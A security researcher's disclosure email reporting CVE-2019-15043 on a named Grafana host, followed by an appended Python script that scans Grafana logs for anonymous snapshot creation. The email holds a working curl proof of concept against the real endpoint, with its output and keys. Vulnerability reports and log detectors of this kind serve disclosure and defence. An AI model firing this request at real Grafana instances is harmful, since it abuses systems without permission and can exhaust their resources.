HEY SECURITY TEAM,

I'm a Security Researcher.

I have found a critical vulnerability at one of your domains, CVE-2019-15043,
which can lead to a DDoS attack and can make the system go down via the Grafana snapshot instance.

Vuln url: https://grafana.opendev.org/api/snapshots

PoC:

root@kali:/home/kali# curl -s -X POST https://grafana.opendev.org/api/snapshots -H "Accept: application/json" -H "Content-Type: application/json" -d '{"dashboard": {}}' | json_pp

{
   "deleteKey" : "6mYFALwQmmpImHeKS30XtFw8ogmoHaSm",
   "deleteUrl" : "http://localhost:3000/api/snapshots-delete/6mYFALwQmmpImHeKS30XtFw8ogmoHaSm",
   "key" : "91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO",
   "url" : "http://localhost:3000/dashboard/snapshot/91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO"
}

For more reference: https://aaron-hoffmann.com/blog/cve-2019-15043/

Fix it by updating to the latest Grafana instance.

Best Regards,

Divya Singh - @Dgirlwhohacks
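As an added, defender-side example (not part of the report above and not Grafana's own code), the following Python scans Grafana's "Request Completed" request log for snapshot creations by an anonymous caller (userId=0 with status 200) and counts bursts per source address, the pattern behind the abuse described above. It assumes router_logging = true in Grafana's [server] config so that successful requests are logged, and the log lines and addresses are constructed.

```python
import re
from collections import Counter

# Constructed sample lines in the logfmt shape of Grafana's "Request Completed"
# records (field names assumed: userId, method, path, status, remote_addr).
# These are not real log lines from grafana.opendev.org.
SAMPLE_LOG = """\
t=2019-08-20T10:00:01+0000 lvl=info msg="Request Completed" logger=context userId=0 orgId=1 uname= method=POST path=/api/snapshots status=200 remote_addr=203.0.113.7 time_ms=12 size=214 referer=
t=2019-08-20T10:00:02+0000 lvl=info msg="Request Completed" logger=context userId=0 orgId=1 uname= method=POST path=/api/snapshots status=200 remote_addr=203.0.113.7 time_ms=11 size=214 referer=
t=2019-08-20T10:00:03+0000 lvl=info msg="Request Completed" logger=context userId=0 orgId=1 uname= method=POST path=/api/snapshots status=200 remote_addr=203.0.113.7 time_ms=10 size=214 referer=
t=2019-08-20T10:00:04+0000 lvl=info msg="Request Completed" logger=context userId=2 orgId=1 uname=alice method=POST path=/api/snapshots status=200 remote_addr=198.51.100.4 time_ms=15 size=214 referer=
t=2019-08-20T10:00:05+0000 lvl=info msg="Request Completed" logger=context userId=0 orgId=1 uname= method=POST path=/api/snapshots status=401 remote_addr=203.0.113.9 time_ms=3 size=40 referer=
"""

# key=value pairs; values are either double-quoted (may contain spaces) or bare.
_KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S*)')


def parse_logfmt(line):
    """Parse one logfmt line into a dict; quoted values are unquoted."""
    fields = {}
    for key, value in _KV.findall(line):
        if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            value = value[1:-1]
        fields[key] = value
    return fields


def unauthenticated_snapshot_posts(log_text):
    """Return records where an anonymous caller (userId=0) created a snapshot.

    A status other than 200 (e.g. the 401 line above) is a rejected request,
    so a 200 with userId=0 means the instance still accepts anonymous creation."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_logfmt(line)
        if (rec.get("method") == "POST"
                and rec.get("path") == "/api/snapshots"
                and rec.get("userId") == "0"
                and rec.get("status") == "200"):
            hits.append(rec)
    return hits


def burst_sources(records, threshold):
    """Count anonymous snapshot creations per remote_addr and keep the
    sources at or above the threshold (the resource-exhaustion pattern)."""
    counts = Counter(r["remote_addr"] for r in records)
    return {addr: n for addr, n in counts.items() if n >= threshold}
```

Run it over a real Grafana log file by reading the file into `unauthenticated_snapshot_posts`; any hit after an upgrade means the unauthenticated snapshot path is still reachable.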